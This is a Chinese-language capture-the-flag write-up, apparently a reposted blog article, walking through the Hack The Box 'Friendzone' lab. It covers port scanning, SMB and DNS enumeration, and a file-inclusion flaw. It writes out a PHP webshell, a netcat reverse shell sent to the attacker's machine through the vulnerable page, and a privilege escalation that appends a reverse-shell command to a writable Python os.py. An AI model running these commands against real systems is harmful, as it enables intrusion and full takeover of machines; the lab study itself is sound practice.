HTB-Friendzone靶场
2022-12-18 22:45:45 Author: 轩公子谈技术(查看原文) 阅读量:8 收藏

端口扫描

nmap -sS -Pn -n --open -T4 -p 1-65535 10.10.10.123

目录扫描

不清楚是什么,密码?cms?

smb漏洞扫描

enum4linux 10.10.10.123

more creds.txt

发现了登陆密码

admin:[email protected]#

回头看,443端口是404,但是开了53端口,查看证书发现了一个域名

子域名目录扫描

dirsearch https://friendzone.red/

base64解密也灭发现什么

又把目标转到dns上了

dig axfr friendzone.red @10.10.10.123

这些域名写入hosts

文件包含

然后挨个尝试

密码就是smb里查到的admin

让访问dash文件

有点像文件包含漏洞,读passwd 没显示

当我读取login页面,发现成功了

说明存在文件包含,这时登陆smb,写一个webshell,然后监听

smb写文件

但是路径不清楚,不过在前面smb漏洞扫描中发现其中有一个路径是/etc/file

这里可使用nmap脚本进行探测

nmap --script smb-enum-shares.nse -p445 10.10.10.123

cat cmd.php<?php systems($_REQUEST['cmd']);?>
smbclient //10.10.10.123/Development -c 'put cmd.php 1.php'

文件包含,还是相对路径使用?传参数就不成功换成&就OK了

https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/1&cmd=id

反弹shell

https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/1&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.14.10 7777 >/tmp/f

root提权

信息收集,使用pspy64 在opt下发现脚本文件

查询可写文件

cd /usr/lib/python2.7find  -type f -writable -ls

发现os.py可写入,于是写入反弹shell命令,运行脚本,就会引用os库,就能产生反弹shell

echo "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 9999 >/tmp/f')" >> /usr/lib/python2.7/os.py

总结:像HTB这种,每一个端口细节都不能放过,能渗透就都渗透一遍,常规端口不行,就全端口,一般也都是端口扫描,目录扫描,漏洞扫描,至于啥地步就看信息收集的能力了。


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MDg2NDI4OA==&mid=2247487514&idx=1&sn=b93f6b2a5c4f7b147361e1b2a1abe9df&chksm=fce9b7d5cb9e3ec3e8e8fb9fd503dc71aaf412098f6a2c5540ff40c8a2310b6335dcfbf0da88#rd
如有侵权请联系:admin#unsafe.sh